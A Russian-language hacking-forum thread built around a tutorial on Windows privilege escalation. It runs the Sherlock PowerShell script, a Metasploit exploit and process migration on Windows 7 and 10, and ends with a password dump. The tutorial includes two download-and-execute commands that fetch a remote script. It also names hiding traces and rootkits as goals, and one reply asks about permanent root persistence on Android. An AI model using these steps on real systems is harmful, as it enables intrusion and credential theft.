• Paranoid - курс по анонимности и безопасности в сети от команды codeby. Защита персональных данных, анонимность в сети интернет, настройка виртуальных машин, безопасная передача данных, анти форензика и еще много всего полезного. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья PowerShell для хакера ( часть X ) Повышения привилегий . [скрипт Sherlock.ps1]

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
736
2 727
#1
maxresdefault.jpg

Приведствую Вас коллеги))
Продолжаем развивать нашу тему
Для просмотра контента необходимо: Войти или зарегистрироваться
и сегодня мы с вами друзья остановимся на очередном этапе тестирования на проникновения , который принято в народе называть "Повышение привилегий" [Privilege Escalation (PrivEsc)] И делать мы это будем опять же таки средствами PowerShell. Так же сегодня я вас познакомлю , по моему мнению , с замечательным инструментом Sherlock.

Для чего нужно повышение привилегий в системе?
  • Для полного контроля системы.
  • Для более стойкого закрепления в системе.
  • Для сокрытие следов преступления,прибывания в системе.
  • Для установки руткитов.
  • Для получения конфиденциальной информации , которая обычному пользователю не доступна.
  • Для извлечения паролей и многое другое...
Ну что ж , думаю более мение понятно для чего это делаеться) Теперь кратенько об нашем инструменте:
Sherlock - это скрипт на PowerShell , который проверяет систему на отсудствие важных обновлений и патчей системы , исходя из чего выдает нам список самых распрастранненых , по мнению автора скрипта , LPE (Local Privilege Escalation) эксплоитов с ссылками на их описание. То есть думаю понятно? Да? Если важного обновления в системе нет - то система потенциально уязвима к тому или иному CVE, все как бы логично просто )

Ну что ж давайте перейдем к тестированию.
Тестировать я буду сразу на двух системах, это :
  • Windows 7 x32
  • Windows 10 x32
Условно представим что мы попали в систему и имеем сессию обычного рядового пользователя:
На Windows 7:
2.PNG

И на Windows 10:

3.PNG

Условно эти две машины скомпрометированы нами:

4.PNG

Подгрузим модуль powershell через метерпретер ( у метерпертора есть расширение которое позволяет импортировать модули , выполнять команды PowerShell и так же запускать интерактивный PowerShell)
Так вот на win10 он у меня подгрузился без проблем:
5.PNG
После чего в справке метерпретора стали доступны нужные нам команды:

6.PNG

Но на win7 у меня он не смог подгрузиться (попытаюсь выяснить причину ошибки , если найду - отпишу в комментариях):

7.PNG

Тем не мение это не мешает мне проверить работу скрипта Sherlock. Ну что ж давайте начнем с Win10:
Можно было конечно подгрузить локално , но я по старому доброму способу "методом дроп"
PS > IEX (New-Object Net.WebClient).downloadstring('
Для просмотра контента необходимо: Войти или зарегистрироваться
9.PNG

Увы шерлок мне не выдал не одного уязвимого CVE на системе с Win10 ((
Видать установленны все важные обновления.
10.PNG

Теперь давайте проверим на машине с Win7:
Так как модуль PowerShell у меня не подгрузился я выполнил нужную команду для скрипта через обычный Windows Shell:
11.PNG
>>> powershell -nop -c IEX (New-Object Net.WebClient).downloadstring('
Для просмотра контента необходимо: Войти или зарегистрироваться
Результат меня приятно удивил)

12.PNG

Система уязвима к множеству различных LPE )

Что ж давайте поищим какой то LPE из списка в метаслоите:

Запустив сплоит видим что был создан привилегированый процес:
13.PNG
Мигрируем в него и получаем привилегии системы))))


14.PNG

В результате успешного повышения можем получить список всех паролей от этой системы:
15.PNG

Для сравнения попытаемся этот же сплойт выполнить на машине с Win10 - и получаем ошибку при попытке миграции в процес.

16.PNG

[ИТОГИ]

Вообщем как видим скрипт делает свою работу , но если на машине со всеми важными обновлениями и патчами с его помощью повысит привилегии врят ли получиться.

Но так же хочу заметить что последнее обновлении скрипта (комит на гитхабе ) был сделан 29.09.2017 ( на 19 дней раньше от написание статьи) - это говорит о том что проект живой , и в случае выхода публичных LPE , автор будет их добавлять в работу своего скрипта.
Так что этот инструмент имеет место быть в наборе пентестера)))
Снимок.PNG

Видосик будет позже.)
Всем спасибо)
 
Последнее редактирование:
11.10.2017
1
0
#4
Посмотреть вложение 11994

Приведствую Вас коллеги))
Продолжаем развивать нашу тему
Для просмотра контента необходимо: Войти или зарегистрироваться
и сегодня мы с вами друзья остановимся на очередном этапе тестирования на проникновения , который принято в народе называть "Повышение привилегий" [Privilege Escalation (PrivEsc)] И делать мы это будем опять же таки средствами PowerShell. Так же сегодня я вас познакомлю , по моему мнению , с замечательным инструментом Sherlock.

Для чего нужно повышение привилегий в системе?

  • Для полного контроля системы.
    Для более стойкого закрепления в системе.
    Для сокрытие следов преступления,прибывания в системе.
    Для установки руткитов.
    Для получения конфиденциальной информации , которая обычному пользователю не доступна.
    Для извлечения паролей и многое другое...
Ну что ж , думаю более мение понятно для чего это делаеться) Теперь кратенько об нашем инструменте:
Sherlock - это скрипт на PowerShell , который проверяет систему на отсудствие важных обновлений и патчей системы , исходя из чего выдает нам список самых распрастранненых , по мнению автора скрипта , LPE (Local Privilege Escalation) эксплоитов с ссылками на их описание. То есть думаю понятно? Да? Если важного обновления в системе нет - то система потенциально уязвима к тому или иному CVE, все как бы логично просто )

Ну что ж давайте перейдем к тестированию.
Тестировать я буду сразу на двух системах, это :

  • Windows 7 x32
    Windows 10 x32
Условно представим что мы попали в систему и имеем сессию обычного рядового пользователя:
На Windows 7:
Посмотреть вложение 11996

И на Windows 10:

Посмотреть вложение 11997

Условно эти две машины скомпрометированы нами:

Посмотреть вложение 11998

Подгрузим модуль powershell через метерпретер ( у метерпертора есть расширение которое позволяет импортировать модули , выполнять команды PowerShell и так же запускать интерактивный PowerShell)
Так вот на win10 он у меня подгрузился без проблем:
Посмотреть вложение 11999
После чего в справке метерпретора стали доступны нужные нам команды:

Посмотреть вложение 12000

Но на win7 у меня он не смог подгрузиться (попытаюсь выяснить причину ошибки , если найду - отпишу в комментариях):

Посмотреть вложение 12001

Тем не мение это не мешает мне проверить работу скрипта Sherlock. Ну что ж давайте начнем с Win10:
Можно было конечно подгрузить локално , но я по старому доброму способу "методом дроп"

Посмотреть вложение 12003

Увы шерлок мне не выдал не одного уязвимого CVE на системе с Win10 ((
Видать установленны все важные обновления.
Посмотреть вложение 12004

Теперь давайте проверим на машине с Win7:
Так как модуль PowerShell у меня не подгрузился я выполнил нужную команду для скрипта через обычный Windows Shell:
Посмотреть вложение 12005
Результат меня приятно удивил)

Посмотреть вложение 12006

Система уязвима к множеству различных LPE )

Что ж давайте поищим какой то LPE из списка в метаслоите:

Запустив сплоит видим что был создан привилегированый процес:
Посмотреть вложение 12007
Мигрируем в него и получаем привилегии системы))))


Посмотреть вложение 12008

В результате успешного повышения можем получить список всех паролей от этой системы:
Посмотреть вложение 12009

Для сравнения попытаемся этот же сплойт выполнить на машине с Win10 - и получаем ошибку при попытке миграции в процес.

Посмотреть вложение 12011

[ИТОГИ]

Вообщем как видим скрипт делает свою работу , но если на машине со всеми важными обновлениями и патчами с его помощью повысит привилегии врят ли получиться.

Но так же хочу заметить что последнее обновлении скрипта (комит на гитхабе ) был сделан 29.09.2017 ( на 19 дней раньше от написание статьи) - это говорит о том что проект живой , и в случае выхода публичных LPE , автор будет их добавлять в работу своего скрипта.
Так что этот инструмент имеет место быть в наборе пентестера)))
Посмотреть вложение 12010

Видосик будет позже.)
Всем спасибо)
Что за ось с msf?Не уж то Kali ?
 

Max2

Member
28.06.2017
20
3
#7
Посмотреть вложение 11994

Приведствую Вас коллеги))
Продолжаем развивать нашу тему
Для просмотра контента необходимо: Войти или зарегистрироваться
и сегодня мы с вами друзья остановимся на очередном этапе тестирования на проникновения , который принято в народе называть "Повышение привилегий" [Privilege Escalation (PrivEsc)] И делать мы это будем опять же таки средствами PowerShell. Так же сегодня я вас познакомлю , по моему мнению , с замечательным инструментом Sherlock.

Для чего нужно повышение привилегий в системе?

  • Для полного контроля системы.
    Для более стойкого закрепления в системе.
    Для сокрытие следов преступления,прибывания в системе.
    Для установки руткитов.
    Для получения конфиденциальной информации , которая обычному пользователю не доступна.
    Для извлечения паролей и многое другое...
Ну что ж , думаю более мение понятно для чего это делаеться) Теперь кратенько об нашем инструменте:
Sherlock - это скрипт на PowerShell , который проверяет систему на отсудствие важных обновлений и патчей системы , исходя из чего выдает нам список самых распрастранненых , по мнению автора скрипта , LPE (Local Privilege Escalation) эксплоитов с ссылками на их описание. То есть думаю понятно? Да? Если важного обновления в системе нет - то система потенциально уязвима к тому или иному CVE, все как бы логично просто )

Ну что ж давайте перейдем к тестированию.
Тестировать я буду сразу на двух системах, это :

  • Windows 7 x32
    Windows 10 x32
Условно представим что мы попали в систему и имеем сессию обычного рядового пользователя:
На Windows 7:
Посмотреть вложение 11996

И на Windows 10:

Посмотреть вложение 11997

Условно эти две машины скомпрометированы нами:

Посмотреть вложение 11998

Подгрузим модуль powershell через метерпретер ( у метерпертора есть расширение которое позволяет импортировать модули , выполнять команды PowerShell и так же запускать интерактивный PowerShell)
Так вот на win10 он у меня подгрузился без проблем:
Посмотреть вложение 11999
После чего в справке метерпретора стали доступны нужные нам команды:

Посмотреть вложение 12000

Но на win7 у меня он не смог подгрузиться (попытаюсь выяснить причину ошибки , если найду - отпишу в комментариях):

Посмотреть вложение 12001

Тем не мение это не мешает мне проверить работу скрипта Sherlock. Ну что ж давайте начнем с Win10:
Можно было конечно подгрузить локално , но я по старому доброму способу "методом дроп"

Посмотреть вложение 12003

Увы шерлок мне не выдал не одного уязвимого CVE на системе с Win10 ((
Видать установленны все важные обновления.
Посмотреть вложение 12004

Теперь давайте проверим на машине с Win7:
Так как модуль PowerShell у меня не подгрузился я выполнил нужную команду для скрипта через обычный Windows Shell:
Посмотреть вложение 12005
Результат меня приятно удивил)

Посмотреть вложение 12006

Система уязвима к множеству различных LPE )

Что ж давайте поищим какой то LPE из списка в метаслоите:

Запустив сплоит видим что был создан привилегированый процес:
Посмотреть вложение 12007
Мигрируем в него и получаем привилегии системы))))


Посмотреть вложение 12008

В результате успешного повышения можем получить список всех паролей от этой системы:
Посмотреть вложение 12009

Для сравнения попытаемся этот же сплойт выполнить на машине с Win10 - и получаем ошибку при попытке миграции в процес.

Посмотреть вложение 12011

[ИТОГИ]

Вообщем как видим скрипт делает свою работу , но если на машине со всеми важными обновлениями и патчами с его помощью повысит привилегии врят ли получиться.

Но так же хочу заметить что последнее обновлении скрипта (комит на гитхабе ) был сделан 29.09.2017 ( на 19 дней раньше от написание статьи) - это говорит о том что проект живой , и в случае выхода публичных LPE , автор будет их добавлять в работу своего скрипта.
Так что этот инструмент имеет место быть в наборе пентестера)))
Посмотреть вложение 12010

Видосик будет позже.)
Всем спасибо)
Хотел спросить DarNode есть такой рабочий метод получаем сессию на андроид поднимаем приведении до рута закрепляется в системе На всегда (то есть делаем себя системным приложением и выходим.Чтоб не возможно было удалить?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
736
2 727
#8
Хотел спросить DarNode есть такой рабочий метод получаем сессию на андроид поднимаем приведении до рута закрепляется в системе На всегда (то есть делаем себя системным приложением и выходим.Чтоб не возможно было удалить?
Думаю есть, но имхо универсального под все девайсы - врятли, ну и пока у меня такого опыта нет. Будет такой опыт - я обезательно поделюсь)))
 

sdfsd

Active member
26.12.2016
30
7
#9
Hi Friend! Подскажите в чем причина такого поведения php метерпретера? Ето из курса WebApp Вивека
 

Вложения

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
736
2 727
#11
На 10ке нет уязвимости, кхм :( Как сейчас повысить привилегии в 10ке?)
Есть , просто у меня на ВМ пропатченая... Да и шерлок это лишь не большой список LPE , всегда нужно учитовать что там я не встретил Hot Potato и ряд других LPE ))
В статье я всего лишь показал в контексте павершелл как юзать перечисление отсудствующих важных патчей и обновлений для повышение привилегий)
[doublepost=1507975057,1507974700][/doublepost]
Hi Friend! Подскажите в чем причина такого поведения php метерпретера? Ето из курса WebApp Вивека
Скорее всего может быть вызвано закрытием браузера и обратным открытием пхп файла с полезной нагрузкой в браузере.
Точно не помню, но вроде пока открыт браузер будет держаться сессия... Вспомню точнее - напишу)
 
07.09.2017
267
306
#12
Тестируемая 10 у меня тоже пропатченная, вот в чем соль. Спасибо за гайд, открыл глаза не некоторые моменты) Думаю что на каждую пропатченную версию найдется свой mr.Robot :)
 

sdfsd

Active member
26.12.2016
30
7
#13
Есть , просто у меня на ВМ пропатченая... Да и шерлок это лишь не большой список LPE , всегда нужно учитовать что там я не встретил Hot Potato и ряд других LPE ))
В статье я всего лишь показал в контексте павершелл как юзать перечисление отсудствующих важных патчей и обновлений для повышение привилегий)
[doublepost=1507975057,1507974700][/doublepost]
Скорее всего может быть вызвано закрытием браузера и обратным открытием пхп файла с полезной нагрузкой в браузере.
Точно не помню, но вроде пока открыт браузер будет держаться сессия... Вспомню точнее - напишу)
Так я его не закрываю
 

Elektrolife

Well-known member
21.10.2016
197
28
#15
К сожалению даже если эксплоит из примера отработал,не всегда это означает права системы..

У меня например эксплоит отработал корректно (
Exploit injected ... injecting payload into 2992...
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.)

и мигрировать получилось,но один хрен Operation failed: Access is denied.

процесс имеет следующие привилегии:

SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Это я криворукий или эксплоит не сработал ? )
 

Lisenok

Well-known member
02.04.2016
105
61
#16
Нашел несколько уязвимостей, не по одной не отработал...(Печально..Но попробую позже еще на других машинках
 
Вверх Снизу